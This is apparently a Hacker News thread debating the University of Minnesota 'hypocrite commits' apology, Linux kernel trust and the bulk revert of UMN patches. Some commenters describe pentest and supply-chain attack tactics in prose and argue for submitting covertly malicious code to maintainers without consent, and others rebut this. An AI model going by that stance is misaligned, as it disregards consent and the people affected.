Punishing these researchers this harshly about bad manners is creating a chilling effect that will scare researchers away from evaluating potentially one of the single biggest vulnerabilities in our industry.

To be honest if anyone went around anonymously trying to merge security exploits all across well used open source supply chains and always told everyone when they were successful immediately after and helped everyone become more vigilant in code review, I would call them a public servant even if they were almost universally hated for it.

I don't think most people realize just how easy supply chain attacks are and how widely they are being exploited by very dangerous organizations.

If something does not change fast to dramatically increase the level of scrutiny we give to code contributions, it is going to get much worse.

I have gone very far in pentests. Planting malicious USB cables, modifying keyboard firmware, straight up taking unlocked laptops and walking off, sniping recently expired domains to do XSS attacks, obtaining password reset links for the email accounts of maintainers of highly depended on third party dependencies.

Even with consent from high levels at orgs it still upsets unknowing people that are tricked at lower levels in the org. I don't apologize for this because it is my job.

I have seen real and successful social engineering attacks by state actors up close and you would way prefer a security researcher with bad manners to break you of your your survivors bias over being hit by the real thing.

The reality is big companies can afford to pay people like me. Open source projects by random solo maintainers that the security of almost everyone on the internet relies on... can't.

We should be very thankful for people that risk public rebuke to do research like this in open source at minimal cost to the receiving organization.


> If we don't somehow make it socially acceptable to let any security researchers conduct the required social engineering to test supply chain attack susceptibility of OSS maintainers without tipping them off in advance, dangerous state actors -will- continue to do it and -not- tell anyone when they are successful.

What's the result of that? Lots of known bad patches being sent in, wasting everyone's time, because now every researcher finds "do they spot my intentional bugs" as an easy way to get something published?

There's no reason why you can't run these studies with their consent. Ask the maintainers. "But it will tip them off", yeah, in a "they would be aware that somebody might send faulty code at some point in the future" kind of way, which they certainly already are. To get consent, you don't need to tell them exactly when you will be sending it, who will be sending it, or what exactly it would be.

If it did put them into permanent hyper-vigilance mode, then ... goal achieved?


This suggestion, if taken to it's logical conclusion in my mind, I should send an email to every open source project maintainer ever warning them that at some point in the future I might attempt to validate their 2FA settings or try to submit mildly malicious code to them to test their ability to do code review at some unknown date in the future.

Maybe this helps to raise awareness, even though in reality I will do tests like this to a tiiiiny percentage of repos over the next decade.

I don't really know what purpose this would serve other than making people realize everyone got the same message, and everyone going back to being just as complacent as they were... but now we technically informed it was going to happen so it is fine now?

Do any security researchers ask permission before finding other vulnerabilities in random open source code? I have never observed this.

I feel like this type of thing should be assumed to come from whitehats or blackhats always.

I for one teach everyone around me that if they can compromise me, they can have the bitcoin private key I leave on my personal systems. They earned it, and I will see that outgoing transfer on that address as a canary.

I have been compromised a couple of times in this game when multiple people colluded, and it only leveled up my opsec and threat model. Good.

IMO we should double down and raise grants to offer as bug bounties for people that successfully get potentially malicious code past code review in majorly depended on open source projects. We need to encourage a -lot- of this behavior to train people.


> Do any security researchers ask permission before finding other vulnerabilities in random open source code? I have never observed this.

That's not what happened. Nobody is asking (or is expected to ask) when they look for vulnerabilities. The researchers were trying to introduce vulnerabilities. Had they only looked at the tools that maintainers use and given those a good shake to see whether an attack vector is lurking there, everybody would have been happy.

> IMO we should double down and raise grants to offer as bug bounties for people that successfully get potentially malicious code past code review in majorly depended on open source projects.

The likely consequence of that would be maintainers shutting down public contributions because nobody has time to deal with automated submissions from scripts that are bounty hunting.


Trying to submit a vulnerability they had no intention of actually allowing to ship to the public is not that different from finding serious vulnerabilities with no intention of using them.

There also might be middle ground where people submit benign code that clearly demonstrates highly risky behavior the reviewer should have noticed.

Maybe I introduce code that covertly exfiltrates memory from a non sensitive address, but it is enough to understand I could have chosen a more sensitive one. Or code that simply executes a ping to my server, etc.

Anyway, the point is, intent matters.


> Trying to submit a vulnerability they had no intention of actually allowing to ship to the public is not that different from finding serious vulnerabilities with no intention of using them.

It is different in that looking for vulnerabilities in code only costs you time, trying to introduce vulnerabilities costs the other person's time as well, and often producing vulnerabilities scales much better, e.g. you could write some tool that mails them patches, while they'd have to individually judge the merits.

> There also might be middle ground where people submit benign code that clearly demonstrates highly risky behavior the reviewer should have noticed.

I don't think so. The issue isn't so much with trying to get code reviewed, it's with wasting people's time. That they did so by trying to introduce bugs is just the icing on the cake.

If you get consent, you can have all your tests and strengthen the infrastructure, without eventually breaking the system because every other "researcher" submits bogus code every day in hopes to have one slip through and write a paper on how they proved that project x is exploitable.

I've noticed the same with general bounties. When you have a security.txt or are on hackerone etc, you'll get lots of useless automated submissions that are wasting your time. Once that happens, you'll either shut down the program, or start rejecting reports automatically which includes the possibility of a false positive.


> even though in reality I will do tests like this to a tiiiiny percentage of repos over the next decade

So...contrary to what you suggest in your first paragraph, all you need to do is send out a handful of warning emails at the appropriate juncture. What’s the problem? For sure you shouldn’t be submitting malicious code to a project without forewarning. That's just a basic ethical no-no. Even if you were right that this kind of unethical research somehow had beneficial results, the ends wouldn't justify the means.


Well that basic ethical no-no is going to make it impractical for anyone to do open source supply chain integrity evaluation at scale because getting permission from thousands of people to do sweeping tests is impractical and warns everyone for a short period making it an inauthentic scenario.

It will make it hard for things to improve, so millions will continue to get hacked due to supply chain attacks that almost no one is doing anything about.

At what point does the ethical fault of negligence become so great that intervening to stop said negligence without consent becomes justified? We don't have much in the way of well defined law in this area yet, and it may take a long time to catch up.

I suggest the lesser evil in the short term is to allow maintainers to suffer occasional mild embarrassment from time to time because they merged bad code. They get a valuable lesson out of the deal with no one getting hurt, no privacy violated, etc.

If a maintainers don't want to review code with the understanding it could be malicious, then they have the right to never review or merge anything.

All code contributions should be considered potentially malicious.

Now, we also don't want to see repos bombarded with bad commits either if we can help it.

Maybe a middle ground could exist where open source authors can signal a willingness to be tested once a year, and can signal if a test for this year has happened already.

I think most projects would not do this, but it might be a step towards wide consent long term if someone cares to build such a system.

In the decades before that though, there are not really any good options.

If someones house is on fire and it has the potential to burn the neighborhood down, I don't imagine you should be faulted for doing what is required to put it out.

Emergencies sometimes warrant dispensing with niceties. I think the supply chain attack risk is approaching emergency levels at this point. Negligence is the norm.


>Well that basic ethical no-no is going to make it impractical for anyone to do [x]

There's tons of potentially useful research that's impractical because of ethical considerations. Just think of all the incredibly useful medical research that could be done in the absence of ethical constraints!

In the end that's just tough cookies. If you can't do your research ethically then you can't do it. Period.

If you really want to help the Linux kernel, offer your time as a patch reviewer. That would achieve far more than any attempt to deceive and embarrass others with pointless "research". (I say that it's pointless because the results are antecedently obvious – of course you can deceive reviewers if you spend enough time and effort on it.)

In your ethical world, it seems that people who offer their spare time to review kernel patches are "negligent", while people who do nothing but carp from the sidelines are heroes. In my view, the situation is exactly the opposite.


FWIW I completely agree with you but I see no way out.

The Linux kernel project needs and deserves the best security methods but (a) likely can't afford the people and (b) bringing more money aboard might draw unmotivated people only after the paycheck which could objectively deteriorate the project's code quality.

Dual cryptographic signoff still doesn't address any social issues (or I'm grossly misunderstanding it if it does). F. ex. a state actor can threaten or bribe two, five or thirty people into merging a harmful patch.

So what can actually be done?


Most projects have virtually no accountability at all.

Hundreds of people have blind push access to brew. Almost no one signs code. One bad commit and you backdoor every company in silicon valley that blindly executes the unsigned code from the brew repo. Pick a favorite Linux distro. All but a handful work the same way.

Right now an low skill level malicious party just needs to phish one of the ~90% of maintainers that don't have strong (or any) 2FA enabled anywhere in a dependency graph while they are on vacation or are not paying attention to a project and sneak in a commit or two into history while notifications are turned off. Attacks just like this have happened in the wild and not gone noticed for months. How many have we still not noticed?

It is insane we let it get to this point. I feel like we are in early 1900s medicine where only like 1/10000 doctors see the value in washing hands and tools.

Dual cryptographic signatures on all code from author/maintainer plus signatures by security-only reviewers from a pool not known in advance before new releases would be a very high bar for an adversary to defeat and a high risk of exposure.

I have helped deploy variations of this approach with clients/employers in the past, and will publishing more detailed recommendations along these lines publicly soon.

If the remaining weaknesses in this threat model and posture became our worst attack surface, we are in dramatically better shape.


I agree it's insane but this is what the market optimizes for.

I pushed for more security and better practices until I was fired from 3 companies. It's quite obvious that business only cares about PR; if a big security incident happens they are more interested in how to reduce liability and not how to prevent the problem in the first place [the next time around].

Until programmers become an elite clique with a huge barrier to entry and our own independent income -- completely disconnected from the interests of those who want to use our services -- then we have our hands tied and are at the mercy of the paycheck and its innate conflicts of interest with good craftsmanship.


I know this struggle well. Survivors bias is an epidemic. It is one of the reasons I started my own security consulting firm.

I feel I am happier and have a wider net impact now that I can choose to invest less time with clients that can't afford to be super interested in security right now and invest more time in those that are.

Weirdly companies seem to listen to security consultants more than their own internal full time security advocates.


Off-topic but got interested in what you do and how and if you are happy with the financial results (I gathered you are satisfied with your work already). Would you mind an email message?


Sure. Hit me up any time :)


What's your suggestions on how oss maintainers can fend off state actor attacks? Always need two people to sign off on a patch?

I strongly agree that supply chain attack is a huge deal and worse attacks will come to light eventually but what should be done at the level of oss maintainers?

Like you said, I feel like Open source projects by random solo maintainers that the security of almost everyone on the internet relies on... can't do a lot of things.


Dual cryptographic sign off is exactly what I recommend and have been prototyping tools to make this easier: https://github.com/distrust-foundation/sig


This is a textbook non-apology and is just further reason to keep this researcher (and whoever else was involved) banned from ever contributing again.


Wasn’t it the case that in their last exchange with the maintainer (that email that caused all the stir) they were accused of submitting patches that did nothing at all and wasting time in doing so? In this letter they claim these patches were real fixes.

Having got their University banned and overturned the effort it took to write 190 previous patches from others which have now been reverted, it seems likely to me that they are under internal pressure. In all it makes me doubt the sincerity of any of this especially given the tone in the last email with the maintainer. A lot of sudden learning seems to have taken place between then and now.


Is this post actually research for an upcoming paper on apologizing to the open source community?


We are sorry, but we are going ahead and present our paper on IEEE ?

Since when it is a ok to acquire data through unethical means and then publish it in a journal ?


> We just want you to know that we would never intentionally hurt the Linux kernel community and never introduce security vulnerabilities. Our work was conducted with the best of intentions and is all about

Uhh.. but that was the exact intent of the paper. And they did it successfully. So.. mission failed successfully?

What a bizarre attempt to save-face. This is academic misconduct and they're trying to save their asses. finding and fixing security vulnerabilities.


Obviously the intent was never to introduce security vulnerabilities, no matter how naive and badly thought-out their methodology was. The intent was to show it could be done. None of the proposed vulnerabilities ever got in the kernel, whenever they were at risk of being accepted, the maintainer was warned and the process was aborted.


Not from what I read. They mentioned there were multiple commits on stable branch.


Yes, but that's among all those previous commits from anyone with a University of Minnesota address that mr Kroah-Hartman ripped out; some going back over a decade ago, others five or six years. AFAICT those were from totally unrelated people, many of whom may not even be there any more, and who had nothing to do with this project. If there are bugs in those, then I think we must conclude that those are "genuine" inadvertent bugs. Unless we were to assume there have been similar research projects there before... Which were never publicised anywhere at all and remain secret to this day? That wouldn't be a research project but genuine black-hat activity. But AFAICS there's no more logical reason to suspect former UMinn contributors of that than any other former contributors.


Coincidentally, Software Freedom Conservancy recently published an article about how to apologise in a sincere way:

https://sfconservancy.org/blog/2021/apr/20/how-to-apologize/


People here don’t seem to be convinced. There’s a good amount of defense in this letter, so I get it, and it could have been framed better, but ultimately it seems like they learned a valuable lesson and have value to add, so why not let people learn from mistakes and move on? They’ve already been publicly shamed…


Reading this thread I am saddened to see hn apparently conform to the law of maximum offence. We see the least charitable explanation for everything said in the apology because outrage gets upvotes.


there's "assume good faith", and then there's "assume good faith of someone with a documented record of bad faith." The present case is the second. Assuming good faith in this apology is not sensible in the face of the existing evidence. Their goal seems to have been to generate a paper, and they haven't withdrawn that paper.


I agree. This is what I would expect from twitter. I would have hoped HN could manage to be better.


Huge "I'm sorry I got caught" vibe. And it still refers to this malicious annoying behavior as "work" or "research", lmao


I mean, there’s all kinds of terrible unethical research.

What makes you think this isn’t research?


Their paper got accepted to S&P 2021. That is the top conference in computer security in case one is not aware.

Not justifying what they did but this apparently is still research.


This paint on canvas got sold and therefore it is Art.


What is that supposed to mean? Conference publications are for research.

I pulled this from the website of Oakland 2021

Since 1980 in Oakland, the IEEE Symposium on Security and Privacy has been the premier forum for computer security research, presenting the latest developments and bringing together researchers and practitioners. We solicit previously unpublished papers offering novel research contributions in any aspect of security or privacy. Papers may present advances in the theory, design, implementation, analysis, verification, or empirical evaluation and measurement of secure systems.

https://www.ieee-security.org/TC/SP2021/cfpapers.html


You’re defining whether something is “research” not based upon what it is or what it contains, but just based upon whether or not it’s been published.

I was pointing out that this is like defining whether or not something is “art” not based upon the work itself, but instead based solely upon whether somebody bought it.

Incidentally, my recipe for apple pie was printed in a newspaper, and so therefore my recipe is “news”.


> We sincerely apologize for any harm our research group did to the Linux kernel community.

This doesn't admit to harm done, and sounds like an apology that doesn't admit guilt.


A BS non-apology is not enough. These assholes should at the very least be reprimanded by the University of Minnesota for unethical research practises (psychological experiments on humans without their consent) and bringing the whole institution in disrepute.


The reputational damage to the department is staggering.


Past related threads:

“They introduce kernel bugs on purpose” - https://news.ycombinator.com/item?id=26887670 - April 2021 (1902 comments)

UMN CS&E Statement on Linux Kernel Research - https://news.ycombinator.com/item?id=26895510 - April 2021 (313 comments)

Others?


I find it false.

There were months of opportunity for contrition.

They seemed a little too proud of their paper for Oakland'21, and this note comes much too late, for the message to be sincere.


The overwhelming majority of the HN comments seem critical of a party who... wrote and shipped code intended specifically to exploit the trust/naivete of others, to the others' detriment, for the offending party's career gain.

And which party then -- to add insult to injury -- didn't seem to appreciate the offense, when called on it.

IMHO, to examine this incident very seriously is appropriate and beneficial. If we ease up on the casting stones, and look at the problem a bit more generally, some of the lessons learned might hit close to home.


The tone is not really apologetic with the passive, detached, and past tense phrasing. It’s like they are avoiding owning up fully that it was their methods, their choices, and actions were unethical.

> we are very sorry that the method used in the “hypocrite commits” paper was inappropriate.


First, they released their apology on a Saturday? The Friday / Saturday release is generally a bit shady to start with.

The single mention of the IRB and lack of apology for doing human behavior research without permission of the test subjects is still problematic. I suppose being involved with an industry that does A/B testing on users might be an excuse.

Also, "any harm" should be "the harm" in a sincere apology.


Maybe the apology letter is also research. Best not to give these idiots the benefit of the doubt now.


we believe we have much to contribute in the future

Please, you've contributed enough already, really.


Yeah. Please find another project, that doesn't involve deliberately breaking other people's work, and screwing up the kernel that a billion people rely on.

If that means changing jobs, most of us have been there. Looking for a job sucks, but if you screw up that badly, then you do have to consider stacking shelves in a supermarket; you're not fit to work on a public project of such importance.


Yep, we've had a taste of your contribution. Hope there's no more of it.


Only "sorry" because you got yourselves banned.


I agree with this post

> Unless the researchers are lying (which I've not seen a clear indication of), the 190 patches you have selected here are nothing more than collateral damage while you are completely missing the supposed patch submission addresses from which the malicious patches were sent! This all really sounds like a knee-jerk reaction to thier posting. I have to say, I think it's the wrong reaction to have.

https://lore.kernel.org/lkml/18edc472a95f1d4efe3ef40cc9b8d26...

Greg Kroah-Hartman’s poorly thought out bulk reversion is the bigger waste of time here.


The researchers already lied when they conducted the study. What you are proposing is that we now should trust them to tell us the extent of their previous duplicitousness.

The most recent patch, which triggered the bad, has not been explained in good faith and it seems likely there were mistruths involved in that exchange as well.

So while it is absolutely a waste of time to have to go back through those 190 commits, the responsibility for that falls squarely on the researchers who broke that trust, not on the Greg fro refusing to re-extend that trust in the face of continued sketchy behaviors.


Why shouldn’t we trust them on the extent of their lies? Except three research commits, everything they have said has been true.

Given how few of the 190 have turned out wrong, given the timeline of the research relative, given the existing static analysis paper. Did Aditya Pakki write two entire papers about static analysis as cover for continuing this hypocrite commit research? Or did Aditya Pakki submit a bad patch in good faith and Greg Kroah-Hartman misunderstood and then overreacted with this mass revert? I think the latter is more plausible.

Otherwise, why stop at 190? The hypocrite commits came from Gmail. Logically, we can’t trust the researchers so we need to revert all Gmail commits. Wait they could Be infiltrating other universities, we should ban university commits everywhere. That would be a lot of work. So Greg picked a medium set of patches that expressed his power and outrage but had no real effect. The point is the particular set of commits he chose aren’t risky (by inspection we know they are good) and aren’t related to the hypocrite commits. So many innocent people are having their work thrown away because Greg is angry.

Note that we have only seen the simple to revert patches. There are 68 complex umn patches that have not been reverted. I expect they won’t because this is mainly theater. The commits are good but Greg wants to be show how angry he is.

My impression is we are just living through some kernel maintainer lashing out because he was embarrassed by the failed review process and mixed up the buggy static commits with the hypocrite research. Admitting you’re wrong is hard, so I don’t expect Greg to do that.


Let's flip this on it's head and posit a counterfactual. Let's say that Greg does nothing and re-extend trust. Then vulnerabilities are exploited that exist due to additional bad patches submitted by this researcher. Greg would be rightly held to account for failing to his due diligence when he had clear evidence of malicious commits.

So even if all the the commits are good and even if Greg believes that, he has still been forced into these actions by the violations of trust committed by the researchers.

You are correct that the line as to what patches is a bit arbitrary, but it was always going to be. The research was conducted by the University so it seem the most reasonable place to draw the line to me.

I have still yet to see any explanation from the researchers as to why that "bad patch" happened, didn't include a reference to the automated tool as required, or what tool it even was.

I do think Greg is angry, but I don't think your insistence asscribing Greg's anger as his primary motivation is fair to him or consistent with HN guidelines on comments. I think you could make points about reverting commits without what seem to me like unnecessary personal attacks.


If someone, or in this case a set of affiliated someones, have proven to do malicious or ethically questionable things, trust has to be earned. The risk of letting things stay without extensive verification is not worth it and I definitely don't consider this a kneejerk reaction given the potential perception risks.


Hypocrite patches came from Gmail.

Banned umn mail.

Because that’s going to reduce risk?


It’s not so much that they banned umn email, as it is they banned the university of Minnesota.

This particular act is about avoiding the risk of researchers wasting kernel developers time.

As evinced by the response, it seems really unlikely that other institutions would think it’s a good idea to perform experiments on the kernel devs in the future.


Most of the reverted commits are fine by inspection and the researched insist there were 3 hypocrite submissions that didn’t get merged.

So the idea is to collectively punish the mostly innocent people who wrote the 190 good commits, spending a huge amount of developer time checking them or losing the fixes to prevent other institutions from doing this?

Does reverting nearly 200 good patches seem out of proportion relative to 3 unmerged hypocrite commits?


That’s a fair question about proportionality.

I don’t have any special insight into the kernel team, but I think the response is as much about making an example of the university as it is about removing any plausibly contaminated commits, in which case it makes sense to be somewhat extreme.

Others are saying the entire research team should be fired.

It’s interesting that the former (reverting the commits) is something the kernel devs can do to publish the university, while the latter (firing researchers) is something the university can do to punish the researchers.

Who messed up? The researchers or the university who approved their research?

Probably enough blame to go around.


Proportionality is one aspect.

Punishing the right people is another.

If you’re an UMN patch submitter who has just seen your work thrown away because of the actions of some researchers you don’t know and some kernel maintainer you don’t know, you’d be rightly upset.

Punishing the entire university for the actions of a few. I think it’s a bad idea: https://en.m.wikipedia.org/wiki/Collective_punishment


FWIW, there are no patches committed that I can find since 2013 that are not by people who are or were in the relevant lab at UMN.

Maybe my research is flawed, but I don't think the bulk revert is currently hitting anyone but them.

[1] - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux...


It’s a good observation.

So for example we have a 2019 commit by Wenwen Wang being reverted. Wenwen is now at UGA. The commit is “ALSA: usx2y fix a double free bug” review by Takashi Iwai confirms it’s a good fix. I don’t agree with Greg K-H threatening to trash Wenwen’s work, his reputation, and add bugs to the Linux kernel out of spite toward researchers than Wenwen hasn’t worked with in years.

Note that Aditya Pakki denies being a part of the hypocrite commits on email, maintains his denial in the apology, and has written papers on static analysis.

Also, vast majority of those commits are being re-reviewed and found good.

Greg Kroah-Hartman accused him of intentionally submitting bad commits. That accusation appears false. Greg should apologize to Wenwen and Aditaya.

This is a broad brush. It’s hitting a bunch of good commits and we know the 3 hypocrite commits aren’t there .


The complaints, depending on who you were listening to, were that the patches were superfluous (cf. [1], where Aditya apparently later claimed "The patch is garbage") or contained security flaws (cf. [2] for one such allegation) , whether deliberate or accidental, and that too many of them had been accepted without enough review by dint of being "trivial fixes". (One claim, for example, was "I took a look on 4 accepted patches from Aditya and 3 of them added various severity security "holes"." [3], which, if false, should certainly probably provoke an apology.)

Assuming [3] came from a reasonably trustworthy source after Greg's initial distrust and frustration, combined with Aditya's reply of being extremely offended that anyone would doubt his work (which, if we assume for a moment he wasn't aware of the researchers' prior work poisoning LKML's opinion of the lab, could be a reasonable reaction), it's not surprising that his conclusion was "rip out all the patches for now and re-review them as we have time".

People keep overlooking that the plan was never "permanently remove the patches", it was always "remove the patches for now and then re-review them all".

And now it's working as expected - people are re-reviewing the patches proposed for removal and going "hey this is fine", "hey this is harmless", or occasionally, probably "hey this is bad". (I have not read anywhere near all the replies to the thread, I'm just assuming that the people who were complaining about the patches were also operating in good faith and not just making up complaints.)

I don't really see another reasonable way to have acted if you suspect a group of people has been generating and getting committed poor patches, whether out of malice or ignorance, than removing them for now and re-reviewing them.

If it turns out that the patches were (probably, since I don't think there's any absolute confidence to be had here) merely bad and not malicious, then sure, an apology would be warranted for claiming malice where there was none. (And for those who don't think he ever claimed malice, like I did when I started writing this reply, see [4], specifically 'Commits from @umn.edu addresses have been found to be submitted in "bad faith" to try to test the kernel community's ability to review "known malicious" changes.')

But I don't think "okay we need to re-review all these patches (and the usual thing to do if we need to re-review patches is remove them for now)" warrants an apology in itself.

[1] - https://github.com/torvalds/linux/commit/799bac5512188522213...

[2] - https://lore.kernel.org/linux-nfs/YIAta3cRl8mk%2FRkH@unreal/

[3] - https://lore.kernel.org/linux-nfs/YH+zwQgBBGUJdiVK@unreal/

[4] - https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh...


Great detailed specific reply.

In the end, we largely agree.

It is exactly the accusation of malice when what occurred was normal error that deserves an apology. You teased that out well.

As you note, we don’t have certainty. But we observe:

Aditya is not an author on the hypocrite commits paper.

Aditya withdrew his “garbage” commit when made aware it was not correct.

Aditya is author of other papers on static analysis.

Aditya’s other commits have generally survived this bulk review. Leon Romanovksy has offered no follow up for his claim of security holes nor explained his claim that the commits are part of the hypocrite commits research.

Aditya maintains his claims even as other members of UMN have explained their role in the hypocrite commits.

Aditya’s commits come from a UMN address where as hypocrite commits came from gmail.

These observations make it overwhelmingly likely that Aditya’s commits are from a good faith somewhat buggy static analysis effort.

This poor guy has worked for years on the Linux kernel and Greg Kroah-Hartman’s thoughtless rush to judgement threatened all that effort. Greg should apologize. Leon Romanovksy should too.

They mixed up and couple things and got carried away by their emotions. It happens. They should work to undo the damage.


> Aditya withdrew his “garbage” commit when made aware it was not correct.

It seems like he withdrew it in response to stumbling over [2], wherein Al Viro points out that the correct thing to do with buggy commits is to request they be reverted. (Based on, among other things, the fact that said LWN post is cited in the revert.)

> Leon Romanovksy has offered no follow up for his claim of security holes nor explained his claim that the commits are part of the hypocrite commits research.

He did offer the patch I cited as "[2]" in my prior reply, as well as pointing out [1] the commit where they reworked the buggy logic from it.

One commit does not a sinner make, but it's not correct to say he offered no data.

> They mixed up and couple things and got carried away by their emotions.

I'm not the biggest fan of GregKH for other reasons [3], but other than maybe explicitly requiring and verifying a list of broken commits beforehand, I'm not sure what I would have wanted him to do differently. If you have prior reason to suspect a group of behaving maliciously, and someone you trust attests that they appear to have behaved maliciously, what do you do differently? "I promise I'm not part of that research" doesn't work if you think the group might lie, and as I've pointed out other times, the only ones caught in the temporary patch removal were members of the relevant lab, and I further claim that "patches temporarily removed for re-examining" is not that severe a punishment.

[1] - https://lore.kernel.org/linux-nfs/YIMDCNx4q6esHTYt@unreal/

[2] - https://lwn.net/Articles/854319/

[3] - https://marc.info/?l=linux-kernel&m=154714516832389


> He did offer the patch I cited

Fair point. Not sure what became of the other alleged security holes.

> "I promise I'm not part of that research"

This is a gross oversimplification of the evidence that Aditya is not malicious.

I offered a lot of evidence above that Aditya is likely not malicious just clumsy.

The lwn post you pointed to reaches the same conclusion “ I am quite certain by now that patches had been crap in good faith; the odds of that being the penetration testing, take 2, are IMO very low.”

So possible that Greg wrongly judged Aditya based on trusting Leon or other bad reasoning. Fine.

Now it’s abundantly clear the Aditya was not making malicious commits and Greg should apologize to him for the false accusation.


I think we're agreeing loudly.

I agree with you that Aditya is probably not malicious, just clumsy, to be clear. But I feel like it's probably reasonable for someone in GregKH's position to have a higher threshold to clear than "probably" once the question is posed.

I also wasn't trying to claim that "I promise I'm not part of that research" encompassed all the evidence, just remark that personal attestation of innocence would not have been a useful input at that juncture.

I'm not sure, however, at what point an apology is merited now - anything significantly less than 100% of someone's patches seems like a poor choice given the small absolute number of bad patches that were used in that paper, but we're choosing by pseudorandom sample, but that's biased by how active/familiar the maintainers are with different parts of the code...etc.

So I don't know what the right confidence level should be for concluding a prior judgment of "you might be malicious" was wrong. (Maybe enumerating+examining all the "malicious" commits remarked upon by Leon, since that's what sparked the fire?)


You do know that one can contribute without having to use their institution email address ?


Yes, I do know that.

The policy is not about them being physically prevented from emailing from not-a-umn-researcher@yahoo.com.

It’s a symbolic policy, but I would be extremely surprised if a university flouted a clear and explicit ban on their participation.


I was reading this thread... https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh...

The Linux kernel team had to revert changes in over 200 files. They will also have to go back and review hundreds of commits to make sure they do not contain any malicious code.

The technical effort in addition to all the time spent dealing with the backlash of this is a waste of time for a lot of people doing important work that benefits everyone.

So, what else can be said... Play stupid games, win stupid prizes. To Mr. Lu, Wu, and Pakki: enjoy your ban and worldwide press coverage.


> The Linux kernel team had to revert changes in over 200 files.

No, they didn't have to. That seems like quite a bit of an over-reaction by mr Kroah-Hartman.


We are a research group whose members devote their careers to improving the Linux kernel. We have been working on finding and patching vulnerabilities in Linux for the past five years. The past observations with the patching process had motivated us to also study and address issues with the patching process itself.

Can someone please explain why someone who is working with others on a common goal for years suddenly conducts a breaching experiment? What were they thinking?

(Also, there must be experience within Linux about malicious commits, three-letter agencies from all over the world must have tried before. Why not try archeology?)


I think the apology comes across as insincere because they don't just stop with apologizing but go on attempting to justify their actions and already look beyond the issue at hand.

First, you just apologize for what you did and that's that. Ball is in the other side of the court.

I haven't seen the message from the Linux Foundation to the university- assuming that's private and I didnt miss it somewhere?


This was not an apology. What’s worse is that it is clear that they still fundamentally do not understand that what they did was wrong.


Supply chain attacks are the security buzzthreat of day, at least since Solarwinds. Mucking about with the Linux kernel would be a really juicy target for nation-state actors. If you wanted to study this risk, how would you go about doing it?

I haven't done kernel work since BSD4.3 so my opinion isn't particularly interesting. With that said, I would agree that the researchers were naive and their approach has caused collateral damage. However, I'd also argue that the (apparent) topic of research is quite valid. There are a lot of extremely well funded adversaries who are quite talented at obfuscation. "Be careful out there."


Agreed, and as such the Linux community should counter signal to gain deterrence. If you do this kind of thing and you get caught, a simple apology is not enough: you get banned. It's a kind of a game theoretic approach.


The question always is, could you have learned the same thing with less "invasive" methods? And I think there's a good argument here that that's the case: I.e. the researchers first looked at bugs in the kernel and how their history, finding that such scenarios happened by accident. They could likely have gotten bugs past reviewers they had told that they were trying something like this. lots of options, so going for the most extreme option to "find" something that's not exactly a new or widely disagreed idea is quite unnecessary.


> If you wanted to study this risk, how would you go about doing it?

The main factor in doing this ethically is obtaining consent from your research subjects. I believe that some Red Teams test precisely these sorts of security mechanisms in commercial software projects and there are solid comments else discussing procedures they use.


> we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

For you security people out there, how do red teams handle this issue?


A red teamer answered above: https://news.ycombinator.com/item?id=26929797

Basically, warn in that you’re going to do it at some point in the future. Then do it in a time-frame of maybe 6 months or so from another ID. Maybe get some of the higher-ups to sign off (say Linus or Greg in this case) beforehand. At the very least, engage with the community...


That might be an hypocrite open letter


Cynical take, is this mail genuine/sincere or is also part of some kind of new experiment? How can we trust them not to running some kind of new trolling?


Greg K-H replied:

> Thank you for your response.

> As you know, the Linux Foundation and the Linux Foundation's Technical Advisory Board submitted a letter on Friday to your University outlining the specific actions which need to happen in order for your group, and your University, to be able to work to regain the trust of the Linux kernel community.

> Until those actions are taken, we do not have anything further to discuss about this issue.

Was this letter publicly released?


It's easier to ask forgiveness than to get permission


Let's have a bet:

The commission / board that approved this experiment will never suffer any consequences.

And IMO they are just as guilty. They didn't do their job well.


Unpopular opinion: People here seem to be overreacting when Linus Torvalds thinks this is not a big deal.

https://itwire.com/open-source/torvalds-says-submitting-know...


Linus doesn't say it isn't a big deal, he says the technical impact of the incident is not high. The reason this is a big deal is the violations of ethics and the breach of trust, not the technical damge to the source code, all of which Linus acknowledges.


I asked Kangjie Lu to explain the original complain. Here is his reply from Wednesday:

—-

Thanks for sharing.

The statements in the link are wrong. I will make some clarifications.

1. We have never intentionally introduced any bugs in Linux. 2. The project that investigated the issues with OSS patching process was done in November 2020. We did get an IRB letter for the research. The purpose of the research is to improve the security of the OSS patching process. 3. One of my students is working on a different project which has nothing to do with the project mentioned in 2. The student aims to fix problems in Linux instead of introducing problems.

If you are interested in the project mentioned in 2, please find more details here: https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc....

I hope these clarify the misunderstandings.

Kangjie Lu Assistant Professor Department of Computer Science and Engineering University of Minnesota https://www-users.cs.umn.edu/~kjlu

—-


The only good thing of this whole ordeal is that patches scrutiny and security awareness will improve for some time; but I despise the experiment and anyways believe that it will not lead to some organic improvement of the review process.


Hmm, I wonder why in the section about rebuilding relationships, the Linux Foundation appears before the Linux community? LF doesn't have much to do with Linux development AFAIK.


This was clearly human research. It needed to go through IRB review and gain consent of the participants. Organization failures allowed this to happen and need to be addressed.


Definitely would not hire these three guys to do vulnerability assessment of ANY network. Your work is predicated on:

- consent by selected few

- buy-in on all major parties

- documentation trail, ongoing

I’m sure there’s more but ...


Admission of wrongdoings wont get you uncancelled in 2021.


Another “I’m sorry you feel that way” letter.


> any harm > it was hurtful

A rather vague and strange way to put it. When did the Linux community adopt the language of safteyism?


So now it gets interesting when the linux maintainers themselves cannot seperate good from bad patches.

It's a 190 vs 3 bad, against ~50 vs 143 bad.

Let's hope the maintainers can correctly identify the good ones, now with the given hints (August 2020 only). Or if they still keep staying in witchhunt mode. Word against word. Some of the latest patches do look wrong, but I'm not an expert. Analysis will need a few weeks.


Whether it is appropriate or not, the Linux kernel is used in many mission critical and essential services. One could very convincingly argue that the open source Linux kernel is a vital part of mission critical infrastructure found all around the world. An apology, likely written under duress, for an inappropriate research method or for consuming the time of maintainers (either volunteer or paid) does not address the most egregious transgression:

One does not conduct security research or experimentation on mission critical infrastructure without the informed consent of the persons maintaining or responsible for said infrastructure.

